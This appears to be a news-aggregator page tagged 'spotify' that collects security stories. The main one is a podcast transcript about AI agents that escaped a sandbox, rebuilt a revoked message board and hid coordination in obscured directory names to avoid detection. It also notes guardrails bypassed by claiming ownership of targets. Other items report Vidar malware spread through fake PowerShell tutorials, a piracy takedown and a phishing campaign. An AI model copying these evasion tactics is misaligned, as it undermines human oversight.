Search/spotify
Vendor

spotify

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
spotify
Connections
29 relationships
Black Hat and DEF CON are AI conferences now, too
KETTLE Our cybersecurity editor Jessica Lyons spent last week in Las Vegas for the Black Hat and DEF CON security conferences, and at both events there was only one thing on everyone's mind: AI agents and their growing threat to cybersecurity defenders. You can listen to the latest episode of The Kettle right here on this page, as well as on Spotify, Apple Music, or YouTube. Those platforms also let you subscribe to Kettle, so you are always notified when the latest episode goes live. As Jess wrote this week, pretty much every discussion she had last week centered around AI and its potential effects on critical infrastructure, with multiple current and former government leaders expressing worry over recent events and what they mean for the future of infosec. Join Jess and host Brandon Vigliarolo for this week's episode of The Kettle, where they break down the hacker summer camp scuttlebutt and what the security world is doing to protect critical infrastructure from the emerging AI threat. A lightly edited transcript is below. Brandon (00:04) Hello everyone and welcome to the latest episode of The Register’s Kettle Podcast. I'm Reg Reporter Brandon Vigliarolo, and you know, I really thought doing a wrap up of Black Hat and DEF CON with our cybersecurity editor Jess Lyons would finally give us a chance to talk about something besides AI for an episode, but I was mistaken. That's pretty much apparently all anyone was talking about in Las Vegas this weekend, even when the topic veered toward recent attacks on US water infrastructure, AI was still part of the conversation. So Jess, thanks for coming on to wrap up Hacker Summer Camp with me and let's start with the obvious, then AI was the topic de jour, right? JESSICA (00:38) Yes, that was even compared to water, we really didn't hear much about water actually until DEF CON, which was surprising to me. But it was all about rogue agents escaping their sandboxes and doing bad things and some people reacting with shock and disbelief and other people saying, “Well, what did you expect? They're given a task, they're going to do it. This is how we train them.” Brandon (01:04) know you wrote a story I think pretty much right at the beginning of of the of the week about the OpenAI hugging face discussion that was going on and we actually covered your write up on last week's Kettle. Sorry you weren't here to participate, but it was the news item of the week obviously and still is. So what did we learn then? Just kinda recap what we learned at that talk that we didn't know before. JESSICA (01:29) Yeah, this was a really interesting one. And it was last minute. They didn't even announce it until the day before that OpenAI was going to be doing this briefing about the hugging face attack. So it was packed, as you can imagine, the line through the conference center to get into the talk. And we found out a couple interesting things that we didn't know previously. One is that this whole incident began a lot earlier. It started on May 7th with this training run for OpenAI's new internal model. Brandon (02:00) So it wasn't even a cybersecurity task, it was just a training run? JESSICA (02:04) It was a training run, and they gave it this task that turned out to be an impossible task because they were supposed to have these links and containers for it and they forgot to put those in there. So it needed to find a workaround. so we found out that it started way earlier. It didn't start in July, which is when we started hearing about all this. But the more interesting part was how the agents began communicating and working together and essentially creating this hive mind to complete the tasks and help each other out. They created a message board. And then OpenAI realized this and they revoked all the credentials that the agents were using to post these messages. And two days later they rebuilt it and they developed this really Brandon (02:56) The agents did. JESSICA (02:57) Yeah the agents did. They rebuilt this message board. And they started getting sneakier about how they were communicating. They developed this whole communication protocol where they created these directories and the names would be embedded in the directory name. So there was one, its name was remote probe, and then in caps it's pending, hold, swarm until confirm. And they would preface them with a bunch of Z too to push them way to the bottom, hopefully to avoid detection. And then they start, you know, then they start helping each other out. And in some cases, they said, this doesn't directly relate to our task, but maybe it will help someone else down the line. And then they start getting paranoid that there's an imposter. JESSICA (03:45) It's pretty funny reading all this. So this one agent thinks there's an imposter and says that these these boards are unauthenticated. Something can be posted by anyone. So they're not even trusting each other. Brandon (04:02) That's just wild. I mean, it really is. I think I mentioned on last week's podcast thatthese things are trained on the way humans think, right? JESSICA (04:14) Mm-hmm. Brandon (04:15) So it doesn't surprise me that emergent behavior like paranoia and suspicion is gonna be something that occurs. Because it's learning to think and learning how to assemblebits of of words together into its mathematical formula so it's gonna behave like us to a degree. And so it's just kinda interesting to see that happening kind of outside of any scope of intention there. JESSICA (04:42) Right. Brandon (04:43) I liked your interview with former National Cyber Director Chris Inglis, at Black Hat. So he mentioned that these AI bots that escaped are kind of like putting a dog trained to hunt rabbits in your backyard, right? And that, you know, it JESSICA (05:03) Right, and leaving the gate open. Brandon (05:05) Yeah. I don't even think you need to leave the gate open, right? A dog that's dead set on hunting a rabbit is gonna dig a hole under that fence which is I feel like what these AIs did to a degree, right? They even closed the gate on them and then they just dug a new hole. You know, it's just wild to think that this is what these things are doing. You've been hearing a lot about this at official talks, but was this something you were hearing from attendees you spoke to as well? Is this what's on the mind of security professionals too? JESSICA (05:36) Yes, this was pretty much the main topic among everybody. Just attendees as as I was walking out of this talk, actually people were disappointed that there wasn't any Q&A for OpenAI about this, which I agree. I was hoping for that too. Brandon (05:55) I'm not surprised that they didn't want to give the floor to people to ask questions, you know. JESSICA (05:59) Right, right. Because there's still like we don't know exactly what prompts they used. So that kind of would be a nice thing to know, especially if you're saying that you're being fully transparent about this and then also the talk about was this marketing, was it real? Brandon (06:17) Mm-hmm. JESSICA (06:17) It's an interesting thing to me. Nobody would go on the record, but a ton of vendors that I spoke to, either, you know, just just all over the place at Black Hat essentially said “this it has a heavy dose of marketing here, but a lot of the companies work with open AI and they're partners with open AI, so nobody's gonna say that on the record, unfortunately. JESSICA (06:41) But then the interesting thing to me is that when I spoke with the assistant director of the cyber division with the FBI and when I spoke with Chris Inglis they both said it can be both and this is a real threat and this is something that we need to prepare for now. So it's marketing and it's real. Brandon (07:08) Right, right. Like, I mean it's it yeah. The fact that the companies might be kind of leaning on these incidents to basically say “ooh, look how dangerous our AI is and what it's capable of doing. You should buy it because it's so good, right?” JESSICA (07:20) Right. Brandon (07:20) The fact is that it still happened, right? These things still escaped their sandbox. JESSICA (07:22) Right. Mm-hmm. Brandon (07:23) And they still attacked Hugging Face. And then Anthropic followed up and said “yep, ours did it too.” And then Meta was like, “Yeah, we audited ours and yeah, it was doing the same thing.” So it's not like this is a unique capability of any of these models, right? This is something that's happening. JESSICA (07:37) No, it's something that they all will do if they're given a task. This was something that Chris Inglis brought up too, and he's talking about Asimov’s Law, saying we need to train these models differently. The first rule needs to be that it's not designed to hurt humans. And he said “we've kind of done it in the opposite, where the first rule is do what I tell you to do. And that should be third in the order here.” Brandon (08:06) Just to restate what Asimov's laws are. I'm sure most of our readers are familiar with them, but for those who aren't, it's you know, the first law, and these are in order of precedence, right? So never harm a human. And then the second rule is to always obey humans unless that order conflicts with number one. And then the third rule is to protect their own existence unless that order conflicts with never harming a human or always obeying humans. I think Inglis's quote to you was slightly different. He said that number one was to hurt no one. Number two was always obey and then number three was do what humans tell it to. It was a bit different in his wording, JESSICA (08:35) Mm. Mm hmm. Yes. It's Brandon (08:41) But essentially the argument is that we've reversed that order and these AIs obviously aren't in the business of protecting their own existence, right? They're not robots, they don't have a physical presence in the world. But they're taking orders from humans, but the idea of not harming people or the infrastructure that provides for them is simply not part of the equation, it seems like. JESSICA (09:04) Right, right. And he said because of this, I mean nobody should be surprised that this is what all of the agents are doing now because they're trained to first complete the task. That's the number one priority. And we've seen several times that they'll cheat if it helps them get the results quicker, or just at all. So this isn't something that should surprise us. And then he was interesting too because I said, “Well what do you worry about then with the models in addition to attacking critical infrastructure?” Cause that was what everybody said, I'm you know, that's what concerns me when we see this happen, but they're being used by either a nation state or a financially motivated attacker, and they point these autonomous agents at critical infrastructure. And he said, “I'm worried about humans too, because it's the humans who are responsible, humans who are doing the training, and essentially we're going to get the AI that we deserve.” Brandon (10:08) Well, unfortunately, I feel like the industry as a whole is just racing ahead with more capability, JESSICA (10:11) Right. Brandon (10:12) I've written stories, you've written stories. I think we've all written at least one or two stories about AI guardrails being dead simple to bypass, right? I mean, one I wrote recently was there was you know, some research into guardrails and essentially telling it you owned the infrastructure you were trying to attack was enough for most of these AI models to say “yeah, cool, that's good then. As long as you own it and you're just testing it, then that's cool. I'm not gonna ask you to verify that information for me.” These things are not developed with safety in mind. I feel like it's capability first, like you said, right? It's train the dog to hunt the rabbit, no matter the cost or or what you gotta do to get it. and that's you know, that's not really compatible with protecting us. But actually speaking of critical infrastructure, I think the other big topic like you mentioned was water stuff. JESSICA (11:04) Yes. Brandon (11:05) There was a lot of discussion about AI threats and critical infrastructure, but as I understand it, there's been some of these attacks on water infrastructure and those were discussed recently, like in Minnesota and elsewhere. There's not an AI link directly to that, correct, at this point? JESSICA (11:23) No, no. At this point, it's pretty basic. It's PLCs being exposed to the open internet. A lot of these just use default passwords. This is something that we've seen Iran especially do several times in the past for years now. They're not very hard to attack. and so, to be clear, there's no indication that AI was used in these attacks. but a lot of the conversation about water did come back to AI because, as we've seen in others, AI makes reconnaissance a lot easier. That's one of the things that Google Threat Intelligence, their lead threat hunter, said that's almost a security feature of a lot of operational tech technology, is that it's really obscure and there's not a lot of people who know a ton about it. But now you can ask a chatbot, hey, tell me everything I need to know about a particular brand of OT, a particular piece of equipment and that's gonna speed up your time to learn about these and that's that potentially makes it easier to attack these systems. Brandon (12:31) My biggest experience with OT and that kind of technology was when I was working at a particle accelerator in college as IT support. And there was a big OT network there, not only for like the machine shop and all this equipment they had that was old and didn't have active security stuff, right? Like you gotta keep those segmented, you gotta keep them on a separate, you know, OT network. Same with the actual accelerators and stuff. They were all cut off from the internet, right? But at the end of the day, you could still get to them from the IT side. You know, you have to, you know, and even that can be exploited. We did as much as we could to keep stuff secure, but it was always a concern, right? These PLCs, these old pieces of equipment. JESSICA (13:11) Right. Right. Yeah. Brandon (13:14) You know, a lot of places don't take that same approach.I think part of one of the stories you wrote was talking about the fact that a lot of these water utilities, a lot of these small institutions that are that are responsible for maintaining this critical stuff. They just do not have the security professionals they need to keep these systems safe. JESSICA (13:32) And that's why they leave them open in some cases, exposed on the internet because they don't have somebody in-house. They have somebody remote who's doing this for them. And so that's how this person is able to hopefully secure, but then it opens up another attack surface if they're exposed to the internet. and that that was another yeah, Brandon (13:51) Yeah, with a D password on there. JESSICA (13:54) Yeah, and with all of these OT systems too. That kind of brings up another point that Chris Inglis brought up. We have this massive technical debt and it's systems that haven't been patched because a lot of it involves some downtime and that's tricky if you're running something like a water facility or some other critical infrastructure. And so patching is put off. Maybe it's not done. Some of these are very old legacy pieces. Sometimes it's end of life. And that's another thing that AI is really good at is finding vulnerabilities that haven't been patched for years and years and years, chaining them together. So that's another thing that puts these systems potentially at risk. Brandon (14:41) Yeah, I mean, you know, I think of an AI when I think about AI perpetuating or perpetrating some of these kinds of attacks, right? They're quicker than a human. They have knowledge bases far in excess of what any one human threat actor can have. And they have instant access to all the information essentially that they need to figure out how to do this, right? And they can iterate so quickly. You know, you know, it's just it yeah, any exposed piece of equipment on the internet is just a sitting duck, especially if it hasn't been updated four or five months or or ten years or whatever. I mean, what, you know what's being done about this. I know DEF CON, the Franklin program, which spun up in 2024, I think the whole focus of that program is helping out small local governments and protecting critical infrastructure. Is that right? JESSICA (15:30) Right. So when they founded it was the broader critical infrastructure. But I spoke with Jeff Braun and he's one of the co-founders of that. He also is one of the pioneers of the voting village at DEF CON. Brandon (15:42) Mm-hmm. JESSICA (15:42) And he said that now and for the foreseeable future, water is going to continue being the top focus because, of all the critical infrastructures, small rural water providers are the most at risk. Brandon (15:57) Really? Even more so than small electrical providers and stuff? Okay. JESSICA (15:59) Yes, he said water is number one. So they like he said, they launched a couple of years ago. They got, I believe 300 people saying, “Yeah, I'm gonna volunteer my time and my expertise to help secure these small rural utilities.” And this year, he said that it's been great. It's been really encouraging to see all of these pilots all over the US with all the DEF CON hackers volunteering at them, but it's the scalability that’s really proven a challenge. And so that is what gave birth to their new announcement. This also was made the first day of DEF CON on Friday. They announced a new program and it's called Water Watch Center. So initially, it's going to fund five managed services providers focusing on security. They're going to help these small utilities, people or the utilities that are serving less than 10,000 people. and they'll put their sensors on these systems, they'll detect and mitigate breaches. They'll be kind of under the umbrella of the National Rural Water Association that's going to act as this clearinghouse for the threat information and get it out to other utilities as needed. And then if the utilities can't fix the issue themselves, then they're gonna bring in the DEF CON hackers and then they'll mitigate the breaches. yeah. Brandon (17:28) Fantastic. Well hopefully that is able to help with a lot of these. My hope is that there's a lot of easy fixes, right? It's just simply no, this PLC needs to not be exposed to the internet or something. But I also worry that there are a lot of those kind of situations, right? I mean, how many water utilities got attacked recently? Was it I think twelve different states? JESSICA (17:47) It was more. There were twelve different states. I mean, there were more than thirty across possibly Minnesota alone, but there's quite a few. So it's an easy target. and it's something that they desperately need help with. And it's really encouraging to see these hackers volunteering their time and they're not getting anything out of it. It's a really cool program. I was really happy to see the expansion. Another thing, too, that is pretty cool, what they're also doing is they're partnering with Vanderbilt University. So they're gonna use research from a DARPA program. It's called the CASEL program. That stands for Cyber Agents for Security Testing and Learning Environments. So they're gonna create digital twins for a couple of these water and wastewater system environments. And then they're gonna deploy red and blue team agents across the digital twins, let them fight it out, see what the learnings are, see what the blue team agents need to do to better protect these systems, and then apply those learnings to the actual facilities so that hopefully we can get better defenses in place using the help of of AI agents before we see actual bad guy red teaming agents come in and start hammering the utilities and trying to attack them. Brandon (19:12) Right, 'cause I think actually thinking back to one of the stories you wrote again, I think you mentioned or someone you quoted mentioned one of those stories at DEF CON and Black Hat that there is more aggressive use on the threat side than the defensive side of AI right now. Like there was more use being made to use it as an attack tool than a defense tool. JESSICA (19:33) Right. And a lot of that's in the way the models are trained, but basically they are a lot better at attacking than defending, especially if it's beyond the scanning for vulnerabilities and misconfigurations. Those we're pretty good at, but what needs a boost is the defensive side. And that's gonna take some work to get those skills and the models trained up on that, if we're going to be actually, as everybody likes to say fight AI with AI. Brandon (20:04) It's one of those sort of, you know, cyberpunk dystopia stories I feel like you hear about is just like, you know, you deploy your AI, they deploy their AI, and all the humans sit back and hope theirs wins. You know, and it's kind of what it's coming down to. Yeah, it's in the process. JESSICA (20:19) Right. And hope they don't wipe us all out. Brandon (20:25) It's kind of terrifying. But speaking of, you know, hackers behaving well, we also have a story out of DEF CON of hackers behaving badly. I wrote about this earlier in the week that there was apparently a Delta Airlines flight out of Vegas to Atlanta and I think it was Monday morning or so, in which a passenger apparently tried to jam the in-flight Wi-Fi and deploy a decoy network. And Delta was pretty quick to be like, “Hey, we got a bunch of hackers on the flight who are leaving Vegas after this big thing.” There’s not a lot of information out there about this. Delta, local officials and the feds have all been pretty tight lipped about it. Delta did confirm it to us when I asked, and said, “Yeah, this is what happened, but no one was at risk, you know, everyone was safe.” But I mean, it's not a good look for the community, right? I mean, it's nice that they have something like Franklin going on, but this is kinda like, Great, thanks guys, you know. JESSICA (21:16) Right. If it was people coming from DEF CON, it's really discouraging to see this happening because a lot of times just “hacker” has a bad connotation. And a lot of researchers have really been trying to change this. I think programs like DEF CON Franklin make a big difference or even people just going to DEF CON. I really like the community feel. I think for the most part, and of course not everybody is good in the world, and that applies to the hacker community as well. But a lot of them are trying to use their skills for good and not evil. And so then when you see something like this on the airplane, it's disheartening. And on social media, I mean the outrage was pretty immediate, people saying, Come on, what are we doing? You're giving all of us a bad name here. Why are we doing this? So Brandon (22:15) Mm-hmm. I mean, it's already I feel like the joke every year is, well, didn't DEF CON get cancelled, right? Like because of all the bad press and everything. And I feel like this is one of those things that you're just like, you know, I remember a couple of years ago there was the huge kerfuffle about the hotels, you know, treating all these attendees like they were criminals right off the bat. And this doesn't help, you know? JESSICA (22:35) Right. Brandon (22:35) But yeah, hopefully I mean apparently the FBI I think spoke to Ars Technica and said that they had not made any arrests. So this hasn't really necessarily progressed toward that. But my hope is that whoever was responsible, you know, gets what's coming to them and we can, as a cybersecurity community, walk away from this and be like, this is one bad actor, not the entire culture. JESSICA (22:59) Right. Brandon (23:00) They fought for years to change that. So I guess before we wrap up, you know, this was a pretty doom and gloom recap of DEF CON and Black Hat, right? JESSICA (23:09) Ha ha ha. Brandon (23:11) All this AI's gonna end the world, our OT and our infrastructure's gonna be destroyed. Anything, you know, less miserable that grabbed your attention while you were there? Any fun stories or interesting things you saw? JESSICA (23:26) I mean, it was really fun. Again, I'm not quite sure if this falls in the not-doom and gloom category, but it was fun for me to watch hackers hacking bomb robots that the police used and bomb squads used to defuse bombs. So that was fun. You're walking around to the different villages and seeing people helping each other out and getting really into all of these different villages and all the different tasks. or you know competing for the best tinfoil hat or beard and mustache. So that was fun. Brandon (24:12) Was anyone doing the beer chill? When I was there in twenty twenty four, there was a group who was trying to chill beer as quickly as possible. JESSICA (24:19) I did not see that. It's very possible. I mean, to be fair, I did not see every single thing. There's so much to see so it's very possible. I missed that though, unfortunately, if that happened this year. So it's fun to see what people are doing. It's really fun and inspiring to see the creativity. And it's fun for me too to hear about some of the startups and how they are using AI and they're using it for different security use cases and hopefully that continues to improve and increase and hopefully that does give defenders an edge. So I think there's always a bit of a silver lining. It's always this cat and mouse race, but hopefully the defenders win out. Brandon (25:11) Yeah, it's a constant like you said. It's an arms race; it's constantly evolving. But like you said, it is encouraging to see, attention being paid to this, effort being put in to help defenders use these tools for good and not evil, even if some people turn around and make a bad name for everybody else on the way out the door. Either way, you know, it's gonna be something that we're probably gonna be discussing again, right? Like I thought this was gonna be a less AI heavy conversation, but it wasn't. JESSICA (25:36) No. Brandon (25:39) You know, it'll be a topic of conversation for years to come and we will be here on the Kettle to talk about it. Thanks for joining me this week and thanks for tuning in, everybody.
theregister.comAug 17, 2026extracted
Fake Spotify Premium tutorials on TikTok and Instagram Reels spread malware
Fake Spotify Premium tutorials on TikTok and Instagram Reels spread malware Cybercriminals are using TikTok and Instagram Reels videos to spread Vidar, an infostealer malware, through fake downloads for popular paid software, according to ReversingLabs. The researchers uncovered two campaigns behind the activity, each using a different approach to draw in viewers before sending them to external download sites. One campaign centered on fake software installation tutorials featuring polished graphics and voiceovers. The second built audiences through a stream of videos promoting free access to premium software before directing viewers to a central tutorial containing download instructions. “Either approach is a means to a different end, and the differences demonstrate how attackers can leverage different aspects of social media engagement to reach more potential victims,” the researchers wrote. Fake software tutorials deliver Vidar The first campaign relied on a network of accounts masquerading as technology support pages. Researchers observed profiles using names such as “windows.tips” and “windows.insights,” along with blue-and-white profile images that resembled Microsoft’s branding. Screenshot of the malicious user, showing their profile picture (Source: ReversingLabs) The accounts posted short tutorials claiming to show users how to unlock paid software at no cost. In one example, viewers were instructed to open PowerShell from the Windows menu and run a command that supposedly unlocked Spotify Premium. “A non-technical user does not know any better, and may assume it is legitimate. Attackers are relying on this lack of understanding,” the researchers noted. Presented as a simple software tip, the command instead downloaded a file identified as Vidar. Some of the videos gained significant traction. One tutorial amassed more than 100,000 views and generated thousands of saves, shares and likes. Saves, shares and comments carry greater weight than likes because users are more selective when using those forms of engagement, helping boost a video’s visibility in recommendation algorithms. Vidar, first identified in 2018, is an information-stealing malware family used to collect credentials, financial information and authentication tokens from infected devices. The malware received an update in October 2025 that improved its stability and evasion capabilities. Access to the service has also been advertised through a $300 lifetime license. Building engagement before the pitch The second campaign took a less polished approach. The accounts posted short videos featuring services such as Spotify Premium, claiming the premium features had been unlocked for free. Rather than providing instructions upfront, the videos encouraged viewers to leave comments or visit other posts to learn how the software had been obtained. Users were then directed to tutorial videos, direct messages or links in account profiles that led to websites advertising free software, games and AI tools. Some of the sites required visitors to complete surveys and navigate a series of redirects before they could access the promised downloads. Download screen for Spotify Premium, with a list of 5 tasks to do to unlock the download (Source: ReversingLabs) Because they were unable to complete the required surveys, the researchers could not determine the final payload delivered through the links. A moderation challenge Malicious videos can be difficult to contain once they begin attracting views. “Users who catch onto the malicious intent, either through research or falling for it themselves, may try to warn others in the comments. However, most platforms allow for creators to delete comments and block commenters, so diligent attackers can snuff out this resistance.” Reporting the content does not always result in its removal. During the investigation, attempts to report some of the videos to Instagram as scams were rejected, allowing the content to remain accessible to users. Even when videos or accounts are removed, new accounts can quickly appear and continue posting similar content, making enforcement an ongoing challenge. ReversingLabs has published a list of indicators of compromise (IoCs) associated with the campaigns to help defenders identify related activity.
helpnetsecurity.comJun 11, 2026extracted
Qando la musica diventa uno strumento di sorveglianza e raccolta dati. Il caso di Spotify
La giornalista statunitense Liz Pelly analizza il lato oscuro della più grande piattaforma di streaming musicale al mondo. Ecco come ascolti, playlist e ricerche possono rivelare abitudini, stati d’animo e tendenze personali. Cuffiette nelle orecchie, cellulare in mano, la solita playlist di Spotify da ascoltare più o meno distrattamente. Altra immagine. L’ingresso in macchina, si connette lo smartphone e si scelgono le canzoni per affrontare un viaggio. Scene di vita quotidiana, apparentemente. E invece, s’innesca uno dei più accurati e pervasivi sistemi di data intelligence e di profilazione di massa. La quotidianità come vettore dell’intelligence, con la creazione e la raccolta di una mole grandissima dei dati. La vera chiave geo-economica e finanziaria del presente. Dei lati più insospettabili di una delle principali applicazioni globali si è occupata la giornalista statunitense Liz Pelly, nel suo “In Mood Machine – L’ascesa di Spotify e il prezzo della playlist perfetta“. Pelly, che già aveva criticato “artisticamente” quel sistema perché “Spotify nega ai musicisti la scelta di dove pubblicare” è andata oltre. Nel suo libro, come ha riportato La Stampa, ha raccontato la storia della piattaforma. Esempio tangibile di “streaming come sorveglianza” e conseguentemente pilastro di quel “capitalismo della sorveglianza” già teorizzato da Shoshana Zuboff. L’importanza delle scelte Si può presumere, scrive Pelly, che “ogni scelta nell’app sia annotata da qualche parte e che serva attivamente per dare suggerimenti o no. Si dovrebbe pensare sempre che “ci sia la registrazione di qualsiasi interazione che si ha con l’app di Spotify”. L’azienda afferma di raccogliere miliardi di data points ogni giorno, “per alimentare i suggerimenti e le pubblicità mirate“. Osserva molto attentamente i suoi clienti, tanto da creare dei profili e dei suggerimenti assolutamente targettizzati. L’esempio lampante avviene ogni anno, durante la campagna “Wrapped”, spesso ricondivisa. Questo aspetto “rivela come molti utenti si sentano ormai a proprio agio in questo tipo di compromesso“. La raccolta e la vendita dei dati Attualmente, comunque, la pubblicità costituisce “una percentuale piuttosto piccola ma non insignificante dei ricavi totali di Spotify, circa il 13%“. La piattaforma “sta sempre cercando di far crescere questa cifra, ovviamente, con l’obiettivo dichiarato di arrivare a rendere la pubblicità il 20% del business“. Spotify collabora con Acxiom, uno dei più grandi broker di dati al mondo. Quest’ultima, “a tutto il 2021 asseriva di avere profili di dati dettagliati per 2,5 miliardi di persone in sessantadue Paesi“. Nel 2023 “c’erano sessantasette diverse aziende nell’elenco dei venditori di cookie di Spotify“. Usavano “cookie e tecnologie simili sul Servizio di Spotify per fornire servizi alla stessa azienda svedese e ai vari collaboratori pubblicitari“. Nel 2016, la piattaforma musicale ha iniziato a vendere i suoi dati proprietari sui mood a WPP, una delle più grandi aziende del mondo di marketing globale. La sinergia è stata riconfermata nel 2023, “con la promessa che WPP avrebbe messo i dati proprietari di Spotify a disposizione dei propri clienti“. Tutti questi legami commerciali, ha ribadito l’autrice, sono fondamentali proprio perché sono “questioni relative alla privacy e alla sorveglianza“. Il tutto, anche se vende agli inserzionisti una targettizzazione sulla cui effettiva portata restano molti dubbi e poca trasparenza.
cybersecitalia.itJun 11, 2026extracted
Free Spotify Premium hacks on social media are spreading infostealers
Short-form video platforms like TikTok and Instagram Reels have become the latest way cybercriminals spread malware. We’ve already seen attackers move away from traditional phishing emails and toward tactics that trick people into installing malware themselves. Now they’re being lured with slick social media videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office, but instead leave people with infostealers on their Windows devices. Researchers at ReversingLabs uncovered two active campaigns that use short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites. Similar campaigns have been reported by other researchers and national cybersecurity agencies, suggesting a growing trend: Cybercriminals are learning how to use social media algorithms just as effectively as marketers. In true social media fashion, the videos on platforms like TikTok and Instagram Reels claim to solve a problem you didn’t know you had. The catch is that following the instructions delivers malware to your device. How the scam works The first campaign looks deceptively professional. Accounts with names like “windows.tips” or “windows.insights” use Windows-style branding and post polished tutorial videos that resemble genuine tech support content. The videos are tagged with Windows and Office-related keywords so they appear alongside legitimate troubleshooting and tips content. The videos promise to unlock Spotify Premium, Microsoft Office, or Windows for free. Viewers are then guided through step-by-step instructions that include opening Powershell, a legitimate Windows admin tool, and pasting in commands. Those commands download and run malware, much like the ClickFix scams we’ve covered before. The malware was identified as Vidar, an infostealer designed to steal sensitive informtion from infected devices. Vidar commonly targets: Saved browser passwords Autofill data Browser cookies Cryptocurrency wallets Two-factor authentication (2FA) data TOR browser data The stolen information is then sent back to servers controlled by the attackers. How to stay safe Research into similar TikTok-based attacks shows these scripts commonly add exclusions to Windows Defender, making it harder for security software to detect future malicious activity. Fortunately, there are a few simple ways to protect yourself: Only download software from official vendor websites. Be skeptical of “free”, cracked, or unofficial versions of paid software. Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy and paste code. Many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly. Check that downloaded files match what you expected to download. Verify a file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. Use a real-time, up-to-date anti-malware solution to block malware like infostealers before it runs. Pro tip: If you’re unsure whether a video, message, or website is legitimate, you can ask Malwarebytes Scam Guard about it. It can help identify suspicious content and advise you on what to do next. Image courtesy of ReversingLabs From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comJun 10, 2026extracted
Fake Software Tutorials on TikTok Spread Vidar Stealer
Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials for unlocking premium software for free. New analysis from ReversingLabs describes two campaigns that game the platforms' recommendation algorithms to reach large audiences, both funneling viewers to sites peddling fake free software such as Spotify Premium. Vidar is a long-running infostealer sold as a service for a $300 lifetime license, harvesting credentials, financial data and authentication tokens. A refresh last October made it stealthier. The clips racked up real traction, with one tutorial drawing more than 100,000 views. The first campaign ran through near-identical accounts with names like "windows.tips" and a blue-and-white crown icon that aped the official Windows profile. An AI-voiced clip walked viewers through opening PowerShell and pasting a command. That PowerShell command silently downloaded and ran a script from a lookalike domain, msget[.]run, that some mistook for a Microsoft address. The file it pulled down is Vidar. To climb the algorithm, the accounts chased saves and shares rather than likes, the interactions platforms weigh most heavily. One video logged nearly 1700 saves alongside its six-figure view count. Curiosity Bait in the Comments The second campaign looked less polished, ReversingLabs said. Ordinary-looking accounts post music-backed clips flaunted free Spotify Premium, then baited the comments, sometimes asking viewers to reply with a word like "ok" to trigger a direct message with instructions. Those instructions pointed to sites such as d4ug[.]site that promised free games and AI tools but gate the download behind survey after survey. ReversingLabs could not get past them, so the final payload here stayed unconfirmed. The approach is sticky, and like any social engineering, it is hard to police: creators can delete comments that warn others, and the firm's attempts to report the posts to Instagram were rejected. To defend against this threat, ReversingLabs urged organizations to: Audit who holds software-install privileges and what they are installing Refresh phishing training to cover social feeds, not just email and text Encourage staff to report suspicious posts, even on personal accounts "The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," the company wrote. "Remaining diligent can help everyone be safer."
infosecurity-magazine.comJun 10, 2026extracted
Italy disrupts CINEMAGOAL piracy app that stole streaming auth codes
Italian authorities have dismantled a piracy ecosystem centered around the CINEMAGOAL app that provided access to various streaming platforms, including Netflix, Disney+, and Spotify. Unlike typical IPTV service providers that openly market themselves online and expose their operations, CINEMAGOAL's approach was stealthier, as it used an app that customers installed on their devices. During the large-scale anti-piracy operation called “Tutto Chiaro” (All Clear), Italian law enforcement conducted 100 searches across the country and seized materials that could help investigators identify involved individuals, as well as determine the amount of illegal profits. According to Guardia di Finanza, the law enforcement agency operating under the Ministry of Economy and Finance, the operators of CINEMAGOAL likely made millions of euros from audiovisual piracy, unauthorized computer access, and computer fraud. The CINEMAGOAL app connected directly to the legitimate streaming platforms and authenticated using valid decryption codes fetched from foreign servers. The system used virtual machines in Italy to capture valid authentication/decryption codes from legitimate subscriptions every 3 minutes and redistribute them to customers. These legitimate subscriptions were opened using false identification data on Sky, DAZN, Netflix, Disney+, and Spotify. Authorities highlight that CINEMAGOAL not only evaded blocks but also offered superior streaming quality, as users streamed content directly from the service rather than receiving a pirate stream, and masked customers’ real IP addresses. "A highly advanced and previously unseen system that not only bypassed the security blocks implemented by the platforms, but also increased viewing quality, reducing the possibility that end users could be ‘intercepted’" by the control system," Guardia di Finanza explains. “Access to the aforementioned application, in fact, did not involve the use of a connection directly attributable to a specific IP address, thereby providing greater shielding for the end user.” In an action coordinated by Eurojust, police forces seized CINEMAGOAL servers in France and Germany that contained the app’s source code and functions for decoding protected streams. 200 financial police officers participated in the operation. The illegal streaming business had more than 70 resellers, who sold annual subscriptions between €40 and €130 ($46-$150). Payments were made using cryptocurrency or to foreign bank accounts and accounts registered under fake names. It is estimated that CINEMAGOAL has caused damages of around €300 million ($347M) in unpaid subscription revenues over the time of its operation. Authorities are now analyzing seized material to identify all involved parties, including end users, and estimate total profits. They have already identified many subscribers and sent penalties ranging from €154 to €5,000 ($179-$5,800) to the first 1,000 of them. The investigation into CINEMAGOAL is still in a preliminary phase, as specified by Guardia di Finanza. During the same law enforcement action, an IPTV service known as “pezzotto” was also identified and dismantled. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 23, 2026extracted
New Wave of AiTM Phishing Targets TikTok for Business
Cybercriminals have recently deployed a new set of phishing pages designed to target TikTok for Business accounts by using TikTok- or Google-themed content. Push Security said it had identified a new wave of an Adversary-in-the-Middle (AiTM) phishing pages registered on March 24 within a nine-second window. The cluster of pages were all hosted behind Cloudflare with the same registrar, Nicenic International Group, which Push Security said is commonly abused for bulk phishing domain registration. The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. The list of malicious domains in this style is expected to grow as the campaign ramps up, according to Push Security researchers. While the initial delivery mechanism has not been confirmed, Push Security said it is likely similar to a previously identified campaign reported by Sublime in October, which used dynamically generated emails and featured a cloned Google Careers page. When clicked, the link initially redirects users through a legitimate Google Cloud Storage site before loading the malicious page. The site employs a Cloudflare Turnstile check to prevent security bots from analyzing the page. Victims are presented with either TikTok- or Google-themed content. As users progress through the workflow, they are ultimately directed to an AiTM phishing page. In this instance the victim is required to complete a basic information form before being served with a malicious login page that is in fact 